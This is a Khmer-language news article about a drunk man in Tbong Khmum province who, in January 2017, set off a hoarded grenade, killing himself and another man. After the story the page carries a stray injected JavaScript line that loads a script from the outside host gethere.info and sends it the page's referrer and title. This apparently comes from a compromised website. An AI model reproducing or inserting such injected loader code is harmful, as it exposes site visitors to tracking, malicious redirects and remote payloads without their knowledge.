Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ខ្សោយបេះដូងកុំមើល! ស្រវឹងស្រា យកគ្រាប់បែកបោកសំលាប់ខ្លួនឯង និងមិត្តភ័ក្ត្រ ដាច់ដៃដាច់ជើងស្លាប់យ៉ាងអណោចអធម!

ខេត្តត្បូងឃ្មុំ៖ នៅថ្ងៃទី០១ ខែមករា ឆ្នាំ២០១៧ វេលា ម៉ោង១៤ៈ២០នាទី នៅចំណុចក្រោមផ្ទះឈ្មោះសូណាក់ ភេទស្រី អាយុ៤១ឆ្នាំនៅភូមិ ត្របែក ឃុំមេមត់ ស្រុកមេមត់ ខេត្តត្បូងឃ្មុំ មានករណីបោកគ្រាប់បែកសម្លាប់ខ្លួនដោយសារឥទ្ធិផលនៃគ្រឿងស្រវឹង។ប្រភពថា មុនកើតហេតុ ឈ្មោះ សំ សារ៉ាត ហៅជា ភេទប្រុស អាយុ៥៥ឆ្នាំ សញ្ជិាតខ្មែរ មានទីលំនៅភូមិ-ឃុំកើតហេតុខាងលើ ស្រវឹងស្រា ជោគជាំបានយកគ្រាប់បែកមិនស្គាល់ម៉ាក ហើយជិះម៉ូតូម៉ាកស៊ីរ៉ូសពណ៌ក្រហមខ្មៅមកឈប់នៅផ្ទះកើតហេតុហើយបានជួប ឈ្មោះ ខុញ ខា ភេទប្រុស អាយុ៤៣ឆ្នាំ សញ្ជាតិខ្មែរ សួររកទូរស័ព្ទរបស់ខ្លួនហើយឈ្មោះ ខុញ ខា បានឆ្លើយថាមិនឃើញ។  លឺដូចនោះ ឈ្មោះសំ សារ៉ាត ហៅ ជា បានជិះម៉ូតូចេញទៅវិញមួយសន្ទុះក្រោមមកត្រឡប់មកវិញយកគ្រាប់បែកមកដាក់ញ៉ុក ទ្រូងឈ្មោះខុញ ខា រួចនិយាយថាបើឯងស្រលាញ់គ្នាយើងងាប់ទាំងអស់គ្នាថាហើយ ឈ្មោះសំ សារ៉ាត ហៅជា បានដកគ្រាប់បែកផ្ទុះបណ្តាលអោយស្លាប់ ទាំង២នាក់ ចំណែកអ្នកនៅក្រោមផ្ទះរបួសពេញខ្លួន។

ករណីនេះសមត្ថកិច្ចយើងបើការស៊ើបអង្កេតស្រាវជ្រាវរកឃើញមូលហេតុបញ្ជាក់បន្ថែមជូនថា៖
-ករណីនេះគឺជាអំពើអត្តឃាតខ្លួនឯងដោយសារការស្រវឹង។
-ពួកគេគឺជាកម្លាំងA៣ ដែលបានរត់ចោតជួរតាំងពីឆ្នាំ១៩៩២។
-ហើយគ្រាប់បែកនេះជាប្រភេទគ្រាប់បែកដងឈើផលិតនៅប្រទេសចិន ដែលបានលាក់ទុកតាំងពីឆ្នាំ១៩៩២មកម្លេះ។
ហើយបានប្រគល់សពជូនក្រុមគ្រួសារសព ទាំងពីរយកធ្វើបុណ្យតាមប្រពៃណី ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More